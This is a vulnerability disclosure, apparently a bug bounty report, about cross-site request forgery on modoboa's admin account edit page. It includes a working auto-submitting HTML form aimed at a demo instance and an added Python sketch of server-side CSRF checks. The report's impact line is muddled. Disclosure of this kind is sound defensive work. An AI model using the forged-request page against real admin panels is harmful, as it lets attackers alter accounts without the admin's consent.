CSRF leading to edit admin accounts in modoboa/modoboa
Valid
Reported on Feb 26th 2023
Description
GET /admin/accounts/{id}/edit/?active_tab=default page is vulnerable to a CSRF attack.
Proof of Concept
Log in as admin, try to edit admin accounts (example id=4), and open the following file in the browser.
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <!-- Auto-submitting GET form targeting the account edit page -->
    <form action="https://demo.modoboa.org/admin/accounts/4/edit/">
      <input type="hidden" name="active_tab" value="default" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
Impact
Attacker would be forced to edit & update admin accounts
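An added server-side illustration (not modoboa's code) of the check that blocks the request in this PoC: an account edit is rejected unless it is a same-origin POST carrying the session's CSRF token. Request, check_csrf and the path rule are hypothetical; csrfmiddlewaretoken is Django's conventional token field name.

```python
# Added example, not part of the report or of modoboa.
import hmac
from dataclasses import dataclass, field
from typing import Optional, Tuple
from urllib.parse import urlsplit

SITE_ORIGIN = "https://demo.modoboa.org"  # origin of the PoC's form action


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    session_csrf_token: str = ""  # token bound to the victim's session cookie


def is_state_changing(path: str) -> bool:
    # Hypothetical rule: account edit endpoints mutate data.
    return path.startswith("/admin/accounts/") and path.rstrip("/").endswith("/edit")


def request_origin(headers: dict) -> Optional[str]:
    # Prefer the Origin header; fall back to the Referer's scheme://host.
    origin = headers.get("Origin")
    if origin:
        return origin
    ref = headers.get("Referer")
    if ref:
        u = urlsplit(ref)
        return f"{u.scheme}://{u.netloc}"
    return None


def check_csrf(req: Request) -> Tuple[bool, str]:
    """Return (allowed, reason); reads are allowed, writes need POST + origin + token."""
    if not is_state_changing(req.path):
        return True, "read-only path"
    if req.method != "POST":
        return False, "state change must use POST"
    if request_origin(req.headers) != SITE_ORIGIN:
        return False, "cross-site origin"
    submitted = req.form.get("csrfmiddlewaretoken", "")
    expected = req.session_csrf_token
    if not (submitted and expected and hmac.compare_digest(submitted, expected)):
        return False, "missing or mismatched CSRF token"
    return True, "ok"
```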
We are processing your report and will contact the modoboa team within 24 hours.